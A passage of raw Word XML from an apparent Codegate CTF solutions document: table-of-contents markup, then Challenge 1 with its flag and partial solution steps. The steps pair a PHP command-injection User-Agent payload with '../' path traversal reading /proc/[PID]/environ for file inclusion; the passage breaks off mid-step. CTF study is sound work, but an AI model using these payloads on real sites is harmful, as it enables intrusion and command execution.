        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340764" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge14</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340764 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340765" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge15</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340765 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340766" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge16</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340766 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340767" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge17</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340767 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340768" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge18</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340768 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340769" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge19</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340769 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340770" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Appendix</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340770 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009934CF">
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_i1073" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc257340751"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:500   </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ans</w:t>
      </w:r>
      <w:r w:rsidR="002209F4">
        <w:t>wer:HOLA_HOLA_DRINKING_MACHINE</w:t>
      </w:r>
      <w:r w:rsidR="002209F4">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
            <v:stroke joinstyle="miter"/>
            <v:path gradientshapeok="t" o:connecttype="rect"/>
          </v:shapetype>
          <v:shape id="_x0000_s2116" type="#_x0000_t202" style="width:437.4pt;height:83.35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2116" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>beist likes drinking. feel free to give a shot to him when you meet him. this challenge doesn't need to give many hints to you guys. just get to http://ctf7.codegate.org/31337/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009953C5"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r>
                    <w:t>YOU NEED TO GET A SHELL AND SEE A FILE THAT CONTAINS A FLAG OF THIS CHALLENGE. GOOD LUCK.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRPr="009953C5" w:rsidRDefault="00BE74E0" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">use 2 </w:t>
      </w:r>
      <w:r w:rsidR="009953C5" w:rsidRPr="009953C5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>HTTPClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRPr="009953C5" w:rsidRDefault="00AA5FD6" w:rsidP="00BE74E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2115" type="#_x0000_t202" style="width:399.85pt;height:63.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2115" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00BE74E0">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>[Client1]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00BE74E0">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">set  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">UserAgent = "&lt;?php system('ls -la') ?&gt;" </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>and access below</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00BE74E0">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>URL = 'http://ctf7.codegate.org/cgi-bin/hello.cgi?' + '1' * 200</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00BE74E0">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00BE74E0">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>do endless loop</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRPr="009953C5" w:rsidRDefault="009953C5" w:rsidP="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="00AA5FD6" w:rsidP="002B672C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2114" type="#_x0000_t202" style="width:399.85pt;height:110.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2114" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>[Client2]</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">1. acces below and get latest PID </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">http://ctf7.codegate.org/31337/index.php?page=../../../proc/loadavg </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>2. access below , include environ</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">http://ctf7.codegate.org/31337/index.php?page=../../../proc/[PID]/environ </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="002B672C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
